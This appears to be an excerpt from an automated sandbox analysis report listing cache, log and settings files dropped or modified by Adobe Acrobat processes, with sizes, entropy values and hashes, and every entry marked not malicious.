SSDEEP: | 3:6m/lyYeaYk1Zt/57Dek3Jc7tfD/allEqW3l/TjzzQ/t:6mtyzqTR3tc7tfDGmd8/ |
MD5: | 7B98714ADF02505ECF14453F75FF8ED4 |
SHA1: | 0294DEF2C22242F9E866489688FE76A7C688D28A |
SHA-256: | 3EDA974EFECB3BD959EBE7CBC66A10BBC2C295C98883520696CB7FA183C4B82D |
SHA-512: | F21F0328709C0C6DD5F9B3EEEB015D07AA75A93F74F2F881D73697260EE283F6A73FB4000F31533FF159EBCD915F0923666FD7B7C894FE77FD0C391D6F8D29EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.245813129024454 |
Encrypted: | false |
SSDEEP: | 6:iO4q7Rw+q2PcNwi2nKuAl9OmbnIFUtSq7R1RZmwsq7RWVkwOcNwi2nKuAl9Ombjd:7RRw+vLZHAahFUtPR1R/1RWV54ZHAaSJ |
MD5: | 9F529327C3B385B8F3406D4A32A924E2 |
SHA1: | DDE94913DF2BCD798B5479AA6BBD8E6BAE88F701 |
SHA-256: | 5C3BED1EAC08DC81A242175F45E639A4DD6EBFD59199201F0723F465AF511E9B |
SHA-512: | F1E5EEC4A94E08EE3D07650A45D1B7B40082C68FDB668854B8F454F32F99D2EA10ABAD3A0B15A59133427DF3F20F3443577DE4ABE5192808967850A81D91499B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.245813129024454 |
Encrypted: | false |
SSDEEP: | 6:iO4q7Rw+q2PcNwi2nKuAl9OmbnIFUtSq7R1RZmwsq7RWVkwOcNwi2nKuAl9Ombjd:7RRw+vLZHAahFUtPR1R/1RWV54ZHAaSJ |
MD5: | 9F529327C3B385B8F3406D4A32A924E2 |
SHA1: | DDE94913DF2BCD798B5479AA6BBD8E6BAE88F701 |
SHA-256: | 5C3BED1EAC08DC81A242175F45E639A4DD6EBFD59199201F0723F465AF511E9B |
SHA-512: | F1E5EEC4A94E08EE3D07650A45D1B7B40082C68FDB668854B8F454F32F99D2EA10ABAD3A0B15A59133427DF3F20F3443577DE4ABE5192808967850A81D91499B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.197136576424336 |
Encrypted: | false |
SSDEEP: | 6:iO4q7RhYQyq2PcNwi2nKuAl9Ombzo2jMGIFUtSq7RHG1Zmwsq7RCDkSQRkwOcNwy:7RROQyvLZHAa8uFUtPRHg/1RCwSQR54y |
MD5: | C96300ED496D40A0DAFC1B246DACC82E |
SHA1: | 11B96B4F1CD18C6F3BC0590955FA20D14D23E42B |
SHA-256: | 139A26F8446E966DC579E50706C1F457394B326BC775C38258DC7BCB5EB7E9D2 |
SHA-512: | E0A56C98B5C35D04767324D86BB8FC1D2A15B66CDE5AEA323861D1F8D8495876500AA441A44D6F27CA2EB0963005C0161D6069D55388685FED8B9B6E8970986F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.197136576424336 |
Encrypted: | false |
SSDEEP: | 6:iO4q7RhYQyq2PcNwi2nKuAl9Ombzo2jMGIFUtSq7RHG1Zmwsq7RCDkSQRkwOcNwy:7RROQyvLZHAa8uFUtPRHg/1RCwSQR54y |
MD5: | C96300ED496D40A0DAFC1B246DACC82E |
SHA1: | 11B96B4F1CD18C6F3BC0590955FA20D14D23E42B |
SHA-256: | 139A26F8446E966DC579E50706C1F457394B326BC775C38258DC7BCB5EB7E9D2 |
SHA-512: | E0A56C98B5C35D04767324D86BB8FC1D2A15B66CDE5AEA323861D1F8D8495876500AA441A44D6F27CA2EB0963005C0161D6069D55388685FED8B9B6E8970986F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\02df1abd-0bf9-4e30-8ad0-b3c130a78977.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.958337528440935 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqj7XhsBdOg2H5Ycaq3QYiubSpDyP7E4T3y:Y2sRdsqGdMH5T3QYhbSpDa7nby |
MD5: | FE5F59246AB332730BCE70FD8044EAFC |
SHA1: | 675B42A7AFD874C7C65EE7CF9561AC93BEE92B1A |
SHA-256: | 08FC21D8012CB317850FB568E7B191BD389125B1E997D6CC75BAC7914A19540A |
SHA-512: | 6B26374939F10006A80B9D73619FE860BA9A543F831CC54199852890F1C3F70444D7CCB762F63697413979DD591074BD4DA264113364D5D144AD1C4710CA79C3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\75504ba0-008d-4d11-a6c8-0a6f5f9d8b42.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5a0559.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.234833231584008 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP1omsdOC:CwNw1GHqPySfkcigoO3h28ytP6msdl |
MD5: | 83097AFA42EDC79D81A27867CBB70870 |
SHA1: | 990A93B755510ACD8934DD1B0F42F582B9A6B5FF |
SHA-256: | B10610A1D366196421AB9C165A9FE96B0AB2FB42172801534C79E213B3DBFBB8 |
SHA-512: | 138893AEECF3DD15221B2619094233F11AF0AAC4EB09A5884769E9D89249209817484E05B24628CD7342C6710C5E9BE645D1C54714B6F55FBF475F4990A4A649 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.241113985348894 |
Encrypted: | false |
SSDEEP: | 6:iO4q7RPYQyq2PcNwi2nKuAl9OmbzNMxIFUtSq7RSUDG1Zmwsq7RuMnQRkwOcNwiS:7RRPYQyvLZHAa8jFUtPRSUDg/1RuMnQM |
MD5: | DF4716B0EE4D012332A27996F95F57A8 |
SHA1: | 62E855808386159E1AF6EE6E2707DCF62EB395BF |
SHA-256: | BA9C2ADA4606890CDC58023813DC85F305BEAB0210C71161AE21CADF859A9BBA |
SHA-512: | 2E7EE3A68C5BBB861CE835255C373AB1B9A1DEF71EEBBA0B4E32361A55329220F82F6D46D502465023D65ACD04C46524CA82AC20A2B070C94F2375D1AFC23C1E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.241113985348894 |
Encrypted: | false |
SSDEEP: | 6:iO4q7RPYQyq2PcNwi2nKuAl9OmbzNMxIFUtSq7RSUDG1Zmwsq7RuMnQRkwOcNwiS:7RRPYQyvLZHAa8jFUtPRSUDg/1RuMnQM |
MD5: | DF4716B0EE4D012332A27996F95F57A8 |
SHA1: | 62E855808386159E1AF6EE6E2707DCF62EB395BF |
SHA-256: | BA9C2ADA4606890CDC58023813DC85F305BEAB0210C71161AE21CADF859A9BBA |
SHA-512: | 2E7EE3A68C5BBB861CE835255C373AB1B9A1DEF71EEBBA0B4E32361A55329220F82F6D46D502465023D65ACD04C46524CA82AC20A2B070C94F2375D1AFC23C1E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438706766831278 |
Encrypted: | false |
SSDEEP: | 384:Sezci5G+iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:EWurVgazUpUTTGt |
MD5: | 1756E8E8A804B8F8A86F882313ABFDC1 |
SHA1: | 61570A260CF83062F101A8DCB0D7C51BA4C34A6F |
SHA-256: | 1CFE8BB5018E735AE1C66A6C09C9F57C78A76E93160D539C8C919B5C086D3ECF |
SHA-512: | 30C415259AABB01E814C429E0FE9C060951356D631C8872FCBBE43EEC458F477B0DD564692F3E38041586041DC7439102E490F546E1B6F56F0E9E20878B5CE48 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2135708760461426 |
Encrypted: | false |
SSDEEP: | 24:7+t1T6wKKqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mz4:7MdWKqvmFTIF3XmHjBoGGR+jMz+LhN |
MD5: | 68747515AB2C61D9D0D4344221D732CA |
SHA1: | 93208A8533D628191694997B057C826D2DCBAE4F |
SHA-256: | 8414BC77C7D81F607BC1D6078D7A196D4061C82762DC1E5AC4AF1382478D86D0 |
SHA-512: | 8897F82D5EFFBBE7AF7D6B2CE552736D01DF217A10FB0770AC5C236D90CBD869EEEDA615E628337EEDE4F89E8C05741B8A2CD44712FFAA3535B345E7DBAEBE93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7073714950254373 |
Encrypted: | false |
SSDEEP: | 3:kkFklU3ltfllXlE/HT8k4XlzlltNNX8RolJuRdxLlGB9lQRYwpDdt:kKNVeT8/7NMa8RdWBwRd |
MD5: | 3F6958F0116D8D46DD48CE4989F37F13 |
SHA1: | DBDCA569D3309E46681EF275228B6C374D2B57F2 |
SHA-256: | 2C43BDA5F7E928B3F08EFB368C8D38E39331CA24E520E7D8CB2D895DCC32EFF4 |
SHA-512: | B78099D0BABA6AF11F22BA44C4E58CC756FB68FD970A6AA6967332A386D6A3DFDFC5A2CE123A79202591D9841CAD273D7D03DD88E76F71CC2EA3E55F461C3F84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.233096791118922 |
Encrypted: | false |
SSDEEP: | 6:kKDL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7iDImsLNkPlE99SNxAhUe/3 |
MD5: | E15822F8511277305060707442BBC1DF |
SHA1: | 3E34755D1FF07FF7124D221F3DA0D0920BFFBC19 |
SHA-256: | 48086AD1BAD9A5827FD58E4A8C6109C8766416F35AF38CCBC215D81A3B840D33 |
SHA-512: | 19CFA3AED903976597386BEF25C35BE94745D88A077C0A7E05579927921927376DE344A1977E405CC089BEE11477E4117D6EAB9ACC57C8733FB521F7070ADB9E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3532774285088305 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJM3g98kUwPeUkwRe9:YvXKXB3tAUwbsdTeO5eGMbLUkee9 |
MD5: | 7CD5FA27FEF4A0FE2B301BA99A842102 |
SHA1: | A4B64828C5B70E92E768B0AE11685946CBA7DFC9 |
SHA-256: | 84AA4CD5BC6A48E711D68EDAE444850201FF2B0CBA75EE61A2BC707255A037C5 |
SHA-512: | 0659B195F2E472B42DD64AC30186EA89419E4EA654D8FCB3DC67909C8AA6A09459FD8E725B6937C4D126DBDB83CBBE78ACC128386579773A4C9B6D2E3F358D7A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.287101612208672 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfBoTfXpnrPeUkwRe9:YvXKXB3tAUwbsdTeO5eGWTfXcUkee9 |
MD5: | 9D86781D296380FDDA54C9E34E258465 |
SHA1: | 3691E308EB77FBEB58FE5672FA7F23E950D34E42 |
SHA-256: | 80F4704A412420AAA618FFBD35DDD4E3523E0F88158F55A144AECAF0CAFD2802 |
SHA-512: | 7EDDEAE3C0B85BF2F94504F83665FE044D660CBF9417053FD7E36C8293DB5C6F62BD0CD97E63E2C4DE7829C4F87AA7818A1E7A9805FDC885ACCD8361465A5BB0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2651354411000915 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfBD2G6UpnrPeUkwRe9:YvXKXB3tAUwbsdTeO5eGR22cUkee9 |
MD5: | 6FE31696F06B562570DF3D21F4EED1B6 |
SHA1: | 6A7FC07F811944F02646FE1BD7B4E88802CF2880 |
SHA-256: | 6E78BC8A0580C62F65EA5BCAE47EAFB1753D05B6BAE495ACD8B1167BAEEF3876 |
SHA-512: | D2655166A57784997D71A37B7FB4E4380F9D13524EEFAF538A0C3B82309269D7B0A97CC41C91D07C7EB097E2672D5644F108C792AA16E92EF62C562D4B95059F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.3398018384072135 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfPmwrPeUkwRe9:YvXKXB3tAUwbsdTeO5eGH56Ukee9 |
MD5: | 2A6A11C6CCF0E05C199853CCDF017C48 |
SHA1: | EFDF5AA1B5E89A0A34BC100210AF4CC6234B9D19 |
SHA-256: | EE0FE946F51E91354A250DE0024A05E0C95C5DE65DB82EDE3C312EC33C7CA9DA |
SHA-512: | 7ABD53F8C8C62950FB799D765DF7EEBB017526D1E3454090EF8BF87602413744F506B75C97B1FD4E98788AEFD7E65BBFC8AAAEF5E29AFF78BA8127B8CD3AF3EA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.689112237509294 |
Encrypted: | false |
SSDEEP: | 24:Yv6XBCUwmeO5rpLgE9cQx8LennAvzBvkn0RCmK8czOCCSU1:YvECUTearhgy6SAFv5Ah8cv/U1 |
MD5: | AC832195B7E006A64EDD4A1B0FBFB3BB |
SHA1: | 16CE2CD1AB39071C8DFEEFDA052B293BCEBA5A2D |
SHA-256: | 4C243BE4092F6C2E674CED1EFB4B4B8DDF950E922B4DE7DB691FB64DA70AAF78 |
SHA-512: | 7ED5BB20967ABD39918114D8D3001C403B04A76793F8305B514E6D3B3345FC38301AD707EE3C63610341B4FB7B970753B0B7E9F68379E4C899EBBEDD1C9BE88D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.27496427425028 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJf8dPeUkwRe9:YvXKXB3tAUwbsdTeO5eGU8Ukee9 |
MD5: | CFF2AA1975D13AE43D73C7B2D2BCB1E9 |
SHA1: | DFC2403F31CBA746675F2956F71B780F39C062B6 |
SHA-256: | 480765909EFF5D65467D27A6D759E499C8A526886BAA42274A49F44B486AC7AA |
SHA-512: | 293E26A5FA9F102A45E148DC5AE8464F983503459D292EEB0BC942C2323922E8205FC67DE0778BC4E6F3FDF883AC4B1886C9999D3B5027C3F28855149BE1F52F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.278847499506426 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfQ1rPeUkwRe9:YvXKXB3tAUwbsdTeO5eGY16Ukee9 |
MD5: | 82141C2A7CDB5B62919F81A4898AD492 |
SHA1: | 66AC8A3A261656E8EBB85F64810E48A3E1A8C3A4 |
SHA-256: | 7DC17C272DEA7602809F97CAC96E2CCC1C079730B4B6FBA241282791714FD005 |
SHA-512: | 633AC1F864E6CF146AFC40829D8AC454EA6CFD2B91BEEC3A4EF3C0E85757675164C4B72937701C1F75DAFBFC7E961C34C0ABDCEF78780BB5E2A5083F121C792E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.296301581477395 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfFldPeUkwRe9:YvXKXB3tAUwbsdTeO5eGz8Ukee9 |
MD5: | 4EDCF8D8C0AE29EDC37CA57914F00E1E |
SHA1: | 8EFE723D3CE6347EC27CF686A967BA1888B67A39 |
SHA-256: | E26308D897BB46E594F2DC4E201FC746DE3812A326AA8C6BEE18C02C9080BE87 |
SHA-512: | 61A6EEB8417FFBF8CC39C49AF765673A645C4BC3D5BB887C862E154D82E47CD390F5FC24BA67B87FABC4F0199C10FA9DC54EE1283E1BBC15FE4FC089B9A5B33E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3021869153507195 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfzdPeUkwRe9:YvXKXB3tAUwbsdTeO5eGb8Ukee9 |
MD5: | 84EE084D74B86A2FFCDCEC91F99A577E |
SHA1: | 16D6C79BDC5FF3D43CBE3D01BC850A49F58E74E6 |
